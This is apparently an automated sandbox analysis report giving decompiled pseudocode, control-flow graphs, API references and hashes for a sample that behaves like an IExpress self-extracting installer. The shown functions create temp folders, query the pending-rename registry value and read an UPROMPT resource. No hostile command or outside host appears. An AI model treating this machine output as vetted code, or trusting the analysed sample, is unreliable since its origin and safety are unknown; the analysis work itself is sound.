• GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A4541F
• DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A4542B
• CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A45434
• CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A45452
Strings
Memory Dump Source
• Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
• Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
Similarity
• API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
• API String ID: 1082909758-3862032828
• Opcode ID: c5740d479d061de3a84f4e50ad29af358743f4423dc5ab0cd1a971faa335cfa9
• Instruction ID: 681facc2eea4b819e2ad3ae8855d4498ffff74cddc18d44055931952e8d06d05
• Opcode Fuzzy Hash: c5740d479d061de3a84f4e50ad29af358743f4423dc5ab0cd1a971faa335cfa9
• Instruction Fuzzy Hash: EA11017DB4050467E320EBB69C49FAF766EEFD3312F000125F646D6291CE75898386A2
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 563 a4256d-a4257d 564 a42622-a42627 call a424e0 563->564 565 a42583-a42589 563->565 570 a42629-a4262f 564->570 567 a425e8-a42607 RegOpenKeyExA 565->567 568 a4258b 565->568 571 a425e3-a425e6 567->571 572 a42609-a42620 RegQueryInfoKeyA 567->572 569 a42591-a42595 568->569 568->570 569->570 574 a4259b-a425ba RegOpenKeyExA 569->574 571->570 575 a425d1-a425dd RegCloseKey 572->575 574->571 576 a425bc-a425cb RegQueryValueExA 574->576 575->571 576->575
C-Code - Quality: 86%
E00A4256D(signed int __ecx) {
	int _v8;
	void* _v12;
	signed int _t13;
	signed int _t19;
	long _t24;
	void* _t26;
	int _t31;
	void* _t34;

	_push(__ecx);
	_push(__ecx);
	_t13 = __ecx & 0x0000ffff;
	_t31 = 0;
	if(_t13 == 0) {
		_t31 = E00A424E0(_t26);
	} else {
		_t34 = _t13 - 1;
		if(_t34 == 0) {
			_v8 = 0;
			if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
				goto L7;
			} else {
				_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
				goto L6;
			}
			L12:
		} else {
			if(_t34 > 0 && __ecx <= 3) {
				_v8 = 0;
				_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
				if(_t24 == 0) {
					_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
					L6:
					asm("sbb eax, eax");
					_v8 = _v8 &  !( ~_t19);
					RegCloseKey(_v12); // executed
				}
				L7:
				_t31 = _v8;
			}
		}
	}
	return _t31;
	goto L12;
}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00A44096,00A44096,?,00A41ED3,00000001,00000000,?,?,00A44137,?), ref: 00A425B2
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00A44096,?,00A41ED3,00000001,00000000,?,?,00A44137,?,00A44096), ref: 00A425CB
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,00A41ED3,00000001,00000000,?,?,00A44137,?,00A44096), ref: 00A425DD
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00A44096,00A44096,?,00A41ED3,00000001,00000000,?,?,00A44137,?), ref: 00A425FF
                                                                                                                                                                                                                                            • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00A44096,00000000,00000000,00000000,00000000,?,00A41ED3,00000001,00000000), ref: 00A4261A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00A425F5
                                                                                                                                                                                                                                            • PendingFileRenameOperations, xrefs: 00A425C3
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager, xrefs: 00A425A8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                            • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                            • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                            • Opcode ID: f4ad9303a4fdb93f2159785282e938d2885b684862037b257d46b75534d42ce0
                                                                                                                                                                                                                                            • Instruction ID: 780b93538df1ed17f3c24346977bc19c62c3398b3e818c78894aa7505722f6a2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4ad9303a4fdb93f2159785282e938d2885b684862037b257d46b75534d42ce0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D311823D942228BBAB20DB91AC09EFFBE7CEFD27A1F504055B809A2000D7354E45E7A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 577 a46a60-a46a91 call a47155 call a47208 GetStartupInfoW 583 a46a93-a46aa2 577->583 584 a46aa4-a46aa6 583->584 585 a46abc-a46abe 583->585 586 a46aaf-a46aba Sleep 584->586 587 a46aa8-a46aad 584->587 588 a46abf-a46ac5 585->588 586->583 587->588 589 a46ac7-a46acf _amsg_exit 588->589 590 a46ad1-a46ad7 588->590 591 a46b0b-a46b11 589->591 592 a46b05 590->592 593 a46ad9-a46ae9 call a46c3f 590->593 594 a46b13-a46b24 _initterm 591->594 595 a46b2e-a46b30 591->595 592->591 599 a46aee-a46af2 593->599 594->595 597 a46b32-a46b39 595->597 598 a46b3b-a46b42 595->598 597->598 600 a46b44-a46b51 call a47060 598->600 601 a46b67-a46b71 598->601 599->591 602 a46af4-a46b00 599->602 600->601 611 a46b53-a46b65 600->611 604 a46b74-a46b79 601->604 605 a46c39-a46c3e call a4724d 602->605 608 a46bc5-a46bc8 604->608 609 a46b7b-a46b7d 604->609 612 a46bd6-a46be3 _ismbblead 608->612 613 a46bca-a46bd3 608->613 614 a46b94-a46b98 609->614 615 a46b7f-a46b81 609->615 611->601 619 a46be5-a46be6 612->619 620 a46be9-a46bed 612->620 613->612 617 a46ba0-a46ba2 614->617 618 a46b9a-a46b9e 614->618 615->608 616 a46b83-a46b85 615->616 616->614 621 a46b87-a46b8a 616->621 622 a46ba3-a46bbc call a42bfb 617->622 618->622 619->620 620->604 624 a46c1e-a46c25 620->624 621->614 625 a46b8c-a46b92 621->625 622->624 630 a46bbe-a46bbf exit 622->630 626 a46c27-a46c2d _cexit 624->626 627 a46c32 624->627 625->616 626->627 627->605 630->608
                                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                                            			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int* _t25;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed char _t41;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				signed int _t58;
                                                                                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                                                                                            				intOrPtr* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				E00A47155();
                                                                                                                                                                                                                                            				_push(0x58);
                                                                                                                                                                                                                                            				_push(0xa472b8);
                                                                                                                                                                                                                                            				E00A47208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                            				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                            				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                            				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                            				_t53 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                            					if(0 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(0 != _t56) {
                                                                                                                                                                                                                                            						Sleep(0x3e8);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t58 = 1;
                                                                                                                                                                                                                                            						_t53 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_t67 =  *0xa488b0 - _t58; // 0x2
                                                                                                                                                                                                                                            					if(_t67 != 0) {
                                                                                                                                                                                                                                            						__eflags =  *0xa488b0; // 0x2
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							 *0xa481e4 = _t58;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0xa488b0 = _t58;
                                                                                                                                                                                                                                            							_t37 = E00A46C3F(0xa410b8, 0xa410c4); // executed
                                                                                                                                                                                                                                            							__eflags = _t37;
                                                                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                                                                            								goto L13;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            								_t30 = 0xff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(0x1f);
                                                                                                                                                                                                                                            						L00A46FF4();
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						_t68 =  *0xa488b0 - _t58; // 0x2
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_push(0xa410b4);
                                                                                                                                                                                                                                            							_push(0xa410ac);
                                                                                                                                                                                                                                            							L00A47202();
                                                                                                                                                                                                                                            							 *0xa488b0 = 2;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(_t53 == 0) {
                                                                                                                                                                                                                                            							 *0xa488ac = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t71 =  *0xa488b4;
                                                                                                                                                                                                                                            						if( *0xa488b4 != 0 && E00A47060(_t71, 0xa488b4) != 0) {
                                                                                                                                                                                                                                            							_t60 =  *0xa488b4; // 0x0
                                                                                                                                                                                                                                            							 *0xa4a288(0, 2, 0);
                                                                                                                                                                                                                                            							 *_t60();
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                                                            						_t59 =  *_t25;
                                                                                                                                                                                                                                            						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t41 =  *_t59;
                                                                                                                                                                                                                                            							if(_t41 > 0x20) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							if(_t41 != 0) {
                                                                                                                                                                                                                                            								if(_t54 != 0) {
                                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                            										_t59 = _t59 + 1;
                                                                                                                                                                                                                                            										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            										_t41 =  *_t59;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                            							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                            								_t29 = 0xa;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(_t29);
                                                                                                                                                                                                                                            							_t30 = E00A42BFB(0xa40000, 0, _t59); // executed
                                                                                                                                                                                                                                            							 *0xa481e0 = _t30;
                                                                                                                                                                                                                                            							__eflags =  *0xa481f8;
                                                                                                                                                                                                                                            							if( *0xa481f8 == 0) {
                                                                                                                                                                                                                                            								exit(_t30); // executed
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *0xa481e4;
                                                                                                                                                                                                                                            							if( *0xa481e4 == 0) {
                                                                                                                                                                                                                                            								__imp___cexit();
                                                                                                                                                                                                                                            								_t30 =  *0xa481e0; // 0x80070002
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            							goto L40;
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                            							if(_t41 == 0x22) {
                                                                                                                                                                                                                                            								__eflags = _t54;
                                                                                                                                                                                                                                            								_t15 = _t54 == 0;
                                                                                                                                                                                                                                            								__eflags = _t15;
                                                                                                                                                                                                                                            								_t54 = 0 | _t15;
                                                                                                                                                                                                                                            								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                            							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                            							__eflags = _t26;
                                                                                                                                                                                                                                            							if(_t26 != 0) {
                                                                                                                                                                                                                                            								_t59 = _t59 + 1;
                                                                                                                                                                                                                                            								__eflags = _t59;
                                                                                                                                                                                                                                            								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t59 = _t59 + 1;
                                                                                                                                                                                                                                            							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L40:
                                                                                                                                                                                                                                            					return E00A4724D(_t30);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t58 = 1;
                                                                                                                                                                                                                                            				__eflags = 1;
                                                                                                                                                                                                                                            				goto L7;
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            0x00a46b98
                                                                                                                                                                                                                                            0x00a46ba2
                                                                                                                                                                                                                                            0x00a46b9a
                                                                                                                                                                                                                                            0x00a46b9a
                                                                                                                                                                                                                                            0x00a46b9a
                                                                                                                                                                                                                                            0x00a46ba3
                                                                                                                                                                                                                                            0x00a46bab
                                                                                                                                                                                                                                            0x00a46bb0
                                                                                                                                                                                                                                            0x00a46bb5
                                                                                                                                                                                                                                            0x00a46bbc
                                                                                                                                                                                                                                            0x00a46bbf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a46bbf
                                                                                                                                                                                                                                            0x00a46c1e
                                                                                                                                                                                                                                            0x00a46c25
                                                                                                                                                                                                                                            0x00a46c27
                                                                                                                                                                                                                                            0x00a46c2d
                                                                                                                                                                                                                                            0x00a46c2d
                                                                                                                                                                                                                                            0x00a46c32
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a46bc5
                                                                                                                                                                                                                                            0x00a46bc5
                                                                                                                                                                                                                                            0x00a46bc8
                                                                                                                                                                                                                                            0x00a46bcc
                                                                                                                                                                                                                                            0x00a46bce
                                                                                                                                                                                                                                            0x00a46bce
                                                                                                                                                                                                                                            0x00a46bd1
                                                                                                                                                                                                                                            0x00a46bd3
                                                                                                                                                                                                                                            0x00a46bd3
                                                                                                                                                                                                                                            0x00a46bd6
                                                                                                                                                                                                                                            0x00a46bda
                                                                                                                                                                                                                                            0x00a46be1
                                                                                                                                                                                                                                            0x00a46be3
                                                                                                                                                                                                                                            0x00a46be5
                                                                                                                                                                                                                                            0x00a46be5
                                                                                                                                                                                                                                            0x00a46be6
                                                                                                                                                                                                                                            0x00a46be6
                                                                                                                                                                                                                                            0x00a46be9
                                                                                                                                                                                                                                            0x00a46bea
                                                                                                                                                                                                                                            0x00a46bea
                                                                                                                                                                                                                                            0x00a46b74
                                                                                                                                                                                                                                            0x00a46c39
                                                                                                                                                                                                                                            0x00a46c3e
                                                                                                                                                                                                                                            0x00a46c3e
                                                                                                                                                                                                                                            0x00a46abe
                                                                                                                                                                                                                                            0x00a46abe
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A47155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A47182
                                                                                                                                                                                                                                              • Part of subcall function 00A47155: GetCurrentProcessId.KERNEL32 ref: 00A47191
                                                                                                                                                                                                                                              • Part of subcall function 00A47155: GetCurrentThreadId.KERNEL32 ref: 00A4719A
                                                                                                                                                                                                                                              • Part of subcall function 00A47155: GetTickCount.KERNEL32 ref: 00A471A3
                                                                                                                                                                                                                                              • Part of subcall function 00A47155: QueryPerformanceCounter.KERNEL32(?), ref: 00A471B8
                                                                                                                                                                                                                                            • GetStartupInfoW.KERNEL32(?,00A472B8,00000058), ref: 00A46A7F
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00A46AB4
                                                                                                                                                                                                                                            • _amsg_exit.MSVCRT ref: 00A46AC9
                                                                                                                                                                                                                                            • _initterm.MSVCRT ref: 00A46B1D
                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00A46B49
                                                                                                                                                                                                                                            • exit.KERNELBASE ref: 00A46BBF
                                                                                                                                                                                                                                            • _ismbblead.MSVCRT ref: 00A46BDA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836923961-0
                                                                                                                                                                                                                                            • Opcode ID: 9d24c3af2b3bbc10d546e06cf3ad22c840cc12e1dcc2681a7787c88fa1aac453
                                                                                                                                                                                                                                            • Instruction ID: ce2298991f9dd4cc84ff9c46430577386d4204e3cfded66b8ec562cde978d14d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d24c3af2b3bbc10d546e06cf3ad22c840cc12e1dcc2681a7787c88fa1aac453
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E41E43C984764DBDB21EBA8E9447AE77B0FBC7751F14412AF941E3290CBB548838B42
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 631 a458c8-a458d5 632 a458d8-a458dd 631->632 632->632 633 a458df-a458f1 LocalAlloc 632->633 634 a458f3-a45901 call a444b9 633->634 635 a45919-a45959 call a41680 call a4658a CreateFileA LocalFree 633->635 638 a45906-a45910 call a46285 634->638 635->638 644 a4595b-a4596c CloseHandle GetFileAttributesA 635->644 645 a45912-a45918 638->645 644->638 646 a4596e-a45970 644->646 646->638 647 a45972-a4597b 646->647 647->645
                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E00A458C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				signed char _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				intOrPtr* _t27;
                                                                                                                                                                                                                                            				CHAR* _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t27 = __ecx;
                                                                                                                                                                                                                                            				_t23 = __ecx + 1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t6 =  *_t27;
                                                                                                                                                                                                                                            					_t27 = _t27 + 1;
                                                                                                                                                                                                                                            				} while (_t6 != 0);
                                                                                                                                                                                                                                            				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                            				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                            				if(_t20 != 0) {
                                                                                                                                                                                                                                            					E00A41680(_t20, _t36, _t33);
                                                                                                                                                                                                                                            					E00A4658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                            					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                            					_v8 = _t10;
                                                                                                                                                                                                                                            					LocalFree(_t20);
                                                                                                                                                                                                                                            					_t12 = _v8;
                                                                                                                                                                                                                                            					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						CloseHandle(_t12);
                                                                                                                                                                                                                                            						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                            						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0xa49124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A444B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            					_t14 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t14;
                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00A45534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A458E7
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00A45534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A45943
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00A45534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A4594D
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00A45534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A4595C
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00A45534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A45963
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                            • API String ID: 747627703-2139698323
                                                                                                                                                                                                                                            • Opcode ID: cf9faeb222b544b3d5fe1486e88ffd3103a27d4cf9e33eef73b1bacce9c2c10d
                                                                                                                                                                                                                                            • Instruction ID: c2d1cbd335625dfa0a6fa541104f023b8f5e1c221021f92cec266beb4e62943b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf9faeb222b544b3d5fe1486e88ffd3103a27d4cf9e33eef73b1bacce9c2c10d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9111E27DA002106BD7249FF9AC4DB9B7E99EFC6760B100619B50AE3192CB71980686A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A451E5(void* __eflags) {
                                                                                                                                                                                                                                            				int _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = E00A4468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				if(_t28 != 0) {
                                                                                                                                                                                                                                            					if(E00A4468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                            						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                            						if(_t5 != 0) {
                                                                                                                                                                                                                                            							_t6 = E00A444B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                            							LocalFree(_t28);
